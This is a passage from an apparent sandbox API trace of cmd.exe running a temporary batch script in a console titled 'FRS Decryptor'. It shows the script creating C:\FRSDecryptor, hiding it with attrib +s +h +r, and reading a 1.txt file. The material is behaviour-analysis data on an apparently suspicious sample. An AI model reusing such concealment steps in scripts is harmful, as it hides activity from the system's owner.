lpDistanceToMoveHigh=0x0) returned 0x4e [0068.701] _get_osfhandle (_FileHandle=3) returned 0x88 [0068.701] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0068.701] ReadFile (in: hFile=0x88, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x10ef05c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0x10ef05c*=0x1da7, lpOverlapped=0x0) returned 1 [0068.701] SetFilePointer (in: hFile=0x88, lDistanceToMove=80, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x50 [0068.701] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="\r\nlor 1f\r\nols=100 lines=30\r\n") returned 2 [0068.701] GetFileType (hFile=0x88) returned 0x1 [0068.701] _get_osfhandle (_FileHandle=3) returned 0x88 [0068.701] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x50 [0068.701] _tell (_FileHandle=3) returned 80 [0068.701] _close (_FileHandle=3) returned 0 [0068.701] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\cbug7mrd.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x10ef098, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0068.701] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0068.701] _get_osfhandle (_FileHandle=3) returned 0x88 [0068.701] SetFilePointer (in: hFile=0x88, lDistanceToMove=80, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x50 [0068.702] _get_osfhandle (_FileHandle=3) returned 0x88 [0068.702] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x50 [0068.702] ReadFile (in: hFile=0x88, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x10ef05c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0x10ef05c*=0x1da5, lpOverlapped=0x0) returned 1 [0068.702] SetFilePointer (in: hFile=0x88, lDistanceToMove=82, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x52 [0068.702] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="\r\nlor 1f\r\nols=100 lines=30\r\n") returned 2 [0068.702] GetFileType (hFile=0x88) returned 0x1 [0068.702] _get_osfhandle (_FileHandle=3) returned 0x88 [0068.702] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x52 [0068.702] _tell (_FileHandle=3) returned 82 [0068.702] _close (_FileHandle=3) returned 0 [0068.702] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\cbug7mrd.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x10ef098, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0068.702] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0068.702] _get_osfhandle (_FileHandle=3) returned 0x88 [0068.702] SetFilePointer (in: hFile=0x88, lDistanceToMove=82, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x52 [0068.702] _get_osfhandle (_FileHandle=3) returned 0x88 [0068.702] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x52 [0068.702] ReadFile (in: hFile=0x88, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x10ef05c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0x10ef05c*=0x1da3, lpOverlapped=0x0) returned 1 [0068.703] SetFilePointer (in: hFile=0x88, lDistanceToMove=102, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x66 [0068.703] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=20, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="md C:\\FRSDecryptor\r\nnes=30\r\n") returned 20 [0068.703] GetFileType (hFile=0x88) returned 0x1 [0068.703] _get_osfhandle (_FileHandle=3) returned 0x88 [0068.703] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x66 [0068.703] _tell (_FileHandle=3) returned 102 [0068.703] _close (_FileHandle=3) returned 0 [0068.703] _wcsicmp (_String1="md", _String2="DIR") returned 9 [0068.703] _wcsicmp (_String1="md", _String2="ERASE") returned 8 [0068.703] _wcsicmp (_String1="md", _String2="DEL") returned 9 [0068.703] _wcsicmp (_String1="md", _String2="TYPE") returned -7 [0068.703] _wcsicmp (_String1="md", _String2="COPY") returned 10 [0068.703] _wcsicmp (_String1="md", _String2="CD") returned 10 [0068.703] _wcsicmp (_String1="md", _String2="CHDIR") returned 10 [0068.703] _wcsicmp (_String1="md", _String2="RENAME") returned -5 [0068.703] _wcsicmp (_String1="md", _String2="REN") returned -5 [0068.703] _wcsicmp (_String1="md", _String2="ECHO") returned 8 [0068.703] _wcsicmp (_String1="md", _String2="SET") returned -6 [0068.703] _wcsicmp (_String1="md", _String2="PAUSE") returned -3 [0068.703] _wcsicmp (_String1="md", _String2="DATE") returned 9 [0068.703] _wcsicmp (_String1="md", _String2="TIME") returned -7 [0068.703] _wcsicmp (_String1="md", _String2="PROMPT") returned -3 [0068.703] _wcsicmp (_String1="md", _String2="MD") returned 0 [0068.703] GetConsoleTitleW (in: lpConsoleTitle=0x10eec48, nSize=0x104 | out: lpConsoleTitle="Administrator: FRS Decryptor") returned 0x1d [0068.704] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0068.704] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.704] GetFullPathNameW (in: lpFileName="C:\\FRSDecryptor", nBufferLength=0x104, lpBuffer=0x10ee538, lpFilePart=0x10ee534 | out: lpBuffer="C:\\FRSDecryptor", lpFilePart=0x10ee534*="FRSDecryptor") returned 0xf [0068.704] CreateDirectoryW (lpPathName="C:\\FRSDecryptor" (normalized: "c:\\frsdecryptor"), lpSecurityAttributes=0x0) returned 1 [0068.704] _get_osfhandle (_FileHandle=1) returned 0xc [0068.704] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x3) returned 1 [0068.705] _get_osfhandle (_FileHandle=1) returned 0xc [0068.705] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0068.705] _get_osfhandle (_FileHandle=0) returned 0x8 [0068.705] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0068.705] SetConsoleInputExeNameW () returned 0x1 [0068.705] GetConsoleOutputCP () returned 0x1b5 [0068.706] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0068.706] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.706] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\cbug7mrd.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x10ef098, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0068.706] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0068.706] _get_osfhandle (_FileHandle=3) returned 0x88 [0068.706] SetFilePointer (in: hFile=0x88, lDistanceToMove=102, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x66 [0068.706] _get_osfhandle (_FileHandle=3) returned 0x88 [0068.706] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x66 [0068.706] ReadFile (in: hFile=0x88, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x10ef05c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0x10ef05c*=0x1d8f, lpOverlapped=0x0) returned 1 [0068.707] SetFilePointer (in: hFile=0x88, lDistanceToMove=138, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8a [0068.707] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=36, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRSDecryptor\r\n") returned 36 [0068.707] GetFileType (hFile=0x88) returned 0x1 [0068.707] _get_osfhandle (_FileHandle=3) returned 0x88 [0068.707] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8a [0068.707] _tell (_FileHandle=3) returned 138 [0068.707] _close (_FileHandle=3) returned 0 [0068.707] _wcsicmp (_String1="attrib", _String2="DIR") returned -3 [0068.707] _wcsicmp (_String1="attrib", _String2="ERASE") returned -4 [0068.707] _wcsicmp (_String1="attrib", _String2="DEL") returned -3 [0068.707] _wcsicmp (_String1="attrib", _String2="TYPE") returned -19 [0068.707] _wcsicmp (_String1="attrib", _String2="COPY") returned -2 [0068.707] _wcsicmp (_String1="attrib", _String2="CD") returned -2 [0068.707] _wcsicmp (_String1="attrib", _String2="CHDIR") returned -2 [0068.707] _wcsicmp (_String1="attrib", _String2="RENAME") returned -17 [0068.707] _wcsicmp (_String1="attrib", _String2="REN") returned -17 [0068.707] _wcsicmp (_String1="attrib", _String2="ECHO") returned -4 [0068.707] _wcsicmp (_String1="attrib", _String2="SET") returned -18 [0068.707] _wcsicmp (_String1="attrib", _String2="PAUSE") returned -15 [0068.707] _wcsicmp (_String1="attrib", _String2="DATE") returned -3 [0068.707] _wcsicmp (_String1="attrib", _String2="TIME") returned -19 [0068.707] _wcsicmp (_String1="attrib", _String2="PROMPT") returned -15 [0068.707] _wcsicmp (_String1="attrib", _String2="MD") returned -12 [0068.707] _wcsicmp (_String1="attrib", _String2="MKDIR") returned -12 [0068.707] _wcsicmp (_String1="attrib", _String2="RD") returned -17 [0068.707] _wcsicmp (_String1="attrib", _String2="RMDIR") returned -17 [0068.707] _wcsicmp (_String1="attrib", _String2="PATH") returned -15 [0068.707] _wcsicmp (_String1="attrib", _String2="GOTO") returned -6 [0068.707] _wcsicmp (_String1="attrib", _String2="SHIFT") returned -18 [0068.707] _wcsicmp (_String1="attrib", _String2="CLS") returned -2 [0068.708] _wcsicmp (_String1="attrib", _String2="CALL") returned -2 [0068.715] _wcsicmp (_String1="attrib", _String2="VERIFY") returned -21 [0068.715] _wcsicmp (_String1="attrib", _String2="VER") returned -21 [0068.715] _wcsicmp (_String1="attrib", _String2="VOL") returned -21 [0068.715] _wcsicmp (_String1="attrib", _String2="EXIT") returned -4 [0068.715] _wcsicmp (_String1="attrib", _String2="SETLOCAL") returned -18 [0068.715] _wcsicmp (_String1="attrib", _String2="ENDLOCAL") returned -4 [0068.715] _wcsicmp (_String1="attrib", _String2="TITLE") returned -19 [0068.716] _wcsicmp (_String1="attrib", _String2="START") returned -18 [0068.716] _wcsicmp (_String1="attrib", _String2="DPATH") returned -3 [0068.716] _wcsicmp (_String1="attrib", _String2="KEYS") returned -10 [0068.716] _wcsicmp (_String1="attrib", _String2="MOVE") returned -12 [0068.716] _wcsicmp (_String1="attrib", _String2="PUSHD") returned -15 [0068.716] _wcsicmp (_String1="attrib", _String2="POPD") returned -15 [0068.716] _wcsicmp (_String1="attrib", _String2="ASSOC") returned 1 [0068.716] _wcsicmp (_String1="attrib", _String2="FTYPE") returned -5 [0068.716] _wcsicmp (_String1="attrib", _String2="BREAK") returned -1 [0068.716] _wcsicmp (_String1="attrib", _String2="COLOR") returned -2 [0068.716] _wcsicmp (_String1="attrib", _String2="MKLINK") returned -12 [0068.716] _wcsnicmp (_String1="attr", _String2="cmd ", _MaxCount=0x4) returned -2 [0068.716] SetErrorMode (uMode=0x0) returned 0x0 [0068.716] SetErrorMode (uMode=0x1) returned 0x0 [0068.716] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x14243a0, lpFilePart=0x10eee64 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x10eee64*="Desktop") returned 0x1c [0068.716] SetErrorMode (uMode=0x0) returned 0x1 [0068.716] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0068.716] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0068.716] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0068.716] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.716] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.717] GetLastError () returned 0x2 [0068.717] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.717] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0x1427608 [0068.717] FindClose (in: hFindFile=0x1427608 | out: hFindFile=0x1427608) returned 1 [0068.717] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.717] GetLastError () returned 0x2 [0068.717] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0x1427608 [0068.717] FindClose (in: hFindFile=0x1427608 | out: hFindFile=0x1427608) returned 1 [0068.717] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0068.717] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0068.717] GetConsoleTitleW (in: lpConsoleTitle=0x10eec48, nSize=0x104 | out: lpConsoleTitle="Administrator: FRS Decryptor") returned 0x1d [0068.718] _wcsnicmp (_String1="attr", _String2="cmd ", _MaxCount=0x4) returned -2 [0068.718] SetErrorMode (uMode=0x0) returned 0x0 [0068.718] SetErrorMode (uMode=0x1) returned 0x0 [0068.718] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x1424728, lpFilePart=0x10ee74c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x10ee74c*="Desktop") returned 0x1c [0068.718] SetErrorMode (uMode=0x0) returned 0x1 [0068.718] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0068.718] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0068.718] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0068.718] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.718] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x10ee4d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10ee4d8) returned 0xffffffff [0068.718] GetLastError () returned 0x2 [0068.718] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.719] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x10ee4d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10ee4d8) returned 0x1427608 [0068.719] FindClose (in: hFindFile=0x1427608 | out: hFindFile=0x1427608) returned 1 [0068.719] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x10ee4d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10ee4d8) returned 0xffffffff [0068.719] GetLastError () returned 0x2 [0068.719] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x10ee4d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10ee4d8) returned 0x1427608 [0068.719] FindClose (in: hFindFile=0x1427608 | out: hFindFile=0x1427608) returned 1 [0068.719] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0068.719] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0068.719] GetConsoleTitleW (in: lpConsoleTitle=0x10ee9d4, nSize=0x104 | out: lpConsoleTitle="Administrator: FRS Decryptor") returned 0x1d [0068.720] InitializeProcThreadAttributeList (in: lpAttributeList=0x10ee900, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x10ee8e4 | out: lpAttributeList=0x10ee900, lpSize=0x10ee8e4) returned 1 [0068.720] UpdateProcThreadAttribute (in: lpAttributeList=0x10ee900, dwFlags=0x0, Attribute=0x60001, lpValue=0x10ee8ec, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x10ee900, lpPreviousValue=0x0) returned 1 [0068.720] GetStartupInfoW (in: lpStartupInfo=0x10ee938 | out: lpStartupInfo=0x10ee938*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0068.720] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0068.721] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0068.721] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0068.721] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0068.721] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0068.721] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0068.721] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0068.721] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +s +a +h +r C:\\FRSDecryptor", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x10ee888*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +s +a +h +r C:\\FRSDecryptor", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x10ee8d4 | out: lpCommandLine="attrib +s +a +h +r C:\\FRSDecryptor", lpProcessInformation=0x10ee8d4*(hProcess=0x80, hThread=0x88, dwProcessId=0x6c8, dwThreadId=0xa1c)) returned 1 [0068.724] CloseHandle (hObject=0x88) returned 1 [0068.724] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0068.724] GetEnvironmentStringsW () returned 0x1428940* [0068.724] FreeEnvironmentStringsA (penv="=") returned 1 [0068.724] WaitForSingleObject (hHandle=0x80, dwMilliseconds=0xffffffff) returned 0x0 [0068.768] GetExitCodeProcess (in: hProcess=0x80, lpExitCode=0x10ee86c | out: lpExitCode=0x10ee86c*=0x0) returned 1 [0068.768] CloseHandle (hObject=0x80) returned 1 [0068.768] _vsnwprintf (in: _Buffer=0x10ee954, _BufferCount=0x13, _Format="%08X", _ArgList=0x10ee874 | out: _Buffer="00000000") returned 8 [0068.768] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0068.768] GetEnvironmentStringsW () returned 0x1428940* [0068.768] FreeEnvironmentStringsA (penv="=") returned 1 [0068.768] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0068.768] GetEnvironmentStringsW () returned 0x1428940* [0068.768] FreeEnvironmentStringsA (penv="=") returned 1 [0068.768] DeleteProcThreadAttributeList (in: lpAttributeList=0x10ee900 | out: lpAttributeList=0x10ee900) [0068.768] _get_osfhandle (_FileHandle=1) returned 0xc [0068.768] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x3) returned 1 [0068.768] _get_osfhandle (_FileHandle=1) returned 0xc [0068.768] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0068.769] _get_osfhandle (_FileHandle=0) returned 0x8 [0068.769] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0068.769] SetConsoleInputExeNameW () returned 0x1 [0068.769] GetConsoleOutputCP () returned 0x1b5 [0068.769] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0068.769] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.769] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\cbug7mrd.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x10ef098, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x80 [0068.769] _open_osfhandle (_OSFileHandle=0x80, _Flags=8) returned 3 [0068.770] _get_osfhandle (_FileHandle=3) returned 0x80 [0068.770] SetFilePointer (in: hFile=0x80, lDistanceToMove=138, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8a [0068.770] _get_osfhandle (_FileHandle=3) returned 0x80 [0068.770] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8a [0068.770] ReadFile (in: hFile=0x80, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x10ef05c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0x10ef05c*=0x1d6b, lpOverlapped=0x0) returned 1 [0068.770] SetFilePointer (in: hFile=0x80, lDistanceToMove=212, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xd4 [0068.770] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=74, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="for /f \"delims=\" %%i in ('find \"n\" \"C:\\FRSDecryptor\\1.txt\"')do set n=%%i\r\n") returned 74 [0068.770] GetFileType (hFile=0x80) returned 0x1 [0068.771] _get_osfhandle (_FileHandle=3) 